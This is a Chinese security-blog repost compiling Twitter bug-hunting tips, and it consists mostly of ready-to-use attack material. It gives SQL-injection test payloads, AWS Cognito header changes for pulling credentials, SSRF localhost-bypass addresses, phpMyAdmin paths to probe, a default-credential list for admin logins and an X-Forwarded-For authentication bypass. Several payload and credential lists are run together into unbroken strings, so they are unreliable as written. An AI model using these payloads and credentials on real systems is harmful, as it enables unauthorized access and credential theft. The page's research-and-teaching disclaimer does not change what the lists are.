干货 | Twitter渗透技巧搬运工(一)

admin
admin
admin
138876
文章
114
评论
2022年5月10日22:12:16评论24 views字数 1885阅读6分17秒阅读模式

快速检测有无SQL注入

' OR 1=1--' OR 1=0--%27%20or%201=1*(|(object=*)))%20or%20('x'='x%20or%201=11) or pg_sleep(__TIME__)--/**/or/**/1/**/=1' or username like '%);waitfor delay '0:0:__TIME__'--or isNULL(1/0) /*x' or 1=1 or 'x'='y

来源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

AWS Cognito 配置错误

X-AMZ-TargetAWSCognitoIdentityProviderService.ConfirmSignUpX-AMZ-TargetAWSCognitoIdentityProviderService.GetUser获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应X-AMZ-TARGETAWSCognitoIdentityService.GetCredentialsForIdentity

干货 | Twitter渗透技巧搬运工(一)


来源:

https://threadreaderapp.com/thread/1522086964262051841.html

SSRF Bypass技巧

SSRF Bypasses
http://0.0.0.0http://0http://0x7f000001http://2130706433http://0000::1http://0000::1:25http://0000::1:22http://0000::1:3128http://2130706433http://3232235521http://3232235777http://2852039166http://0o177.0.0.1

来源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

PHPMyadmin渗透技巧

当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径
admin/phpMyAdmin/setup/index.phpphpMyAdmin/main.phpphpmyadmin/pma/Admin/setup/index.phpphpmyadmin/admin/setup/index.phpphpmyadmin/setup/phpmyadmin/setup/index.php

来源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q

找到管理员登录口,可以尝试以下账号密码

admin:adminadmin:aadmin:12346578test:testguest:guestanonymous:anonymousadmin:passwordadmin:root:toorroot:passw0rdroot:rootguest:test$sub_name:passwordADMIN:ADMINAdmin:Admin:a:a

来源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA

漏洞挖掘小技巧-身份绕过小技巧,修改XFF头

Authentication bypass.... 
Using custom header (See attached screenshot):
X-Forwarded-For: 127.0.0.1

干货 | Twitter渗透技巧搬运工(一)

来源:https://twitter.com/BountyOverflow/status/1523264249442627590?s=20&t=aInLegLknUcam2qSjbt2PA

干货 | Twitter渗透技巧搬运工(一)


推荐阅读:


干货 | Github安全搬运工 2022年第六期


干货 | Github安全搬运工 2022年第七期


干货 | Github安全搬运工 2022年第八期


干货 | Github安全搬运工 2022年第九期


实战 | WAF-Bypass之SQL注入绕过思路总结


点赞,转发,在看


由HACK学习编辑整理,如需转载请注明来源HACK学习

干货 | Twitter渗透技巧搬运工(一)

原文始发于微信公众号(HACK学习呀):干货 | Twitter渗透技巧搬运工(一)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月10日22:12:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   干货 | Twitter渗透技巧搬运工(一)https://cn-sec.com/archives/996203.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息